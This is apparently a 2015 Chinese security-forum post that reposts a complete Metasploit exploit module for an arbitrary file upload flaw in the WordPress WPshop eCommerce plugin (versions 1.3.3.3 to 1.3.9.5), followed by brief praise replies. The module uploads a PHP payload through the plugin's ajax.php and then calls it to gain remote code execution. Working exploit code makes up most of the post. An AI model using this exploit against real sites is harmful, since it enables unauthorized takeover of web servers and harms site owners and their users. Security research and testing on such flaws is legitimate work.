查看: 29016|回复: 118

WordPress eCommerce 1.3.9.5上传漏洞

[复制链接]
  • TA的每日心情

    昨天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-4-25 19:13:26 | 显示全部楼层 |阅读模式
    说明:

    1. This Metasploit module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin versions 1.3.3.3 to 1.3.9.5. It allows you to upload arbitrary PHP code and get remote code execution. This Metasploit module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
    复制代码


    [Python] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include Msf::HTTP::Wordpress
      include Msf::Exploit::FileDropper
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
          'Description'    => %q{
            This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
            from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
            code execution. This module has been tested successfully on WordPress WPshop eCommerce
            1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
          },
          'Author'         =>
            [
              'g0blin', # Vulnerability Discovery, initial msf module
              'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module Pull Request
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['WPVDB', '7830'],
              ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
            ],
          'Privileged'     => false,
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
          'DisclosureDate' => 'Mar 09 2015',
          'DefaultTarget'  => 0)
        )
      end
     
      def check
        check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
      end
     
      def exploit
        php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
     
        data = Rex::MIME::Message.new
        data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
        data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
        post_data = data.to_s
     
        res = send_request_cgi(
          'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
          'method'    => 'POST',
          'ctype'     => "multipart/form-data; boundary=#{data.bound}",
          'data'      => post_data
        )
     
        if res
          if res.code == 200 && res.body =~ /#{php_page_name}/
            print_good("#{peer} - Payload uploaded as #{php_page_name}")
            register_files_for_cleanup(php_page_name)
          else
            fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Server did not answer")
        end
     
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
          5
        )
      end
    end
     
    [2015-04-25]  #
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-4-25 21:26:45 | 显示全部楼层
    666666666,论坛人气还不如以前08sec
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 18:14:05 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 19:53:54 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 00:28:16 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-6-29 07:12:19 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-6-29 15:00:01 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 03:21:36 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 03:39:48 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 02:42:14 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-14 14:31 , Processed in 0.031578 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部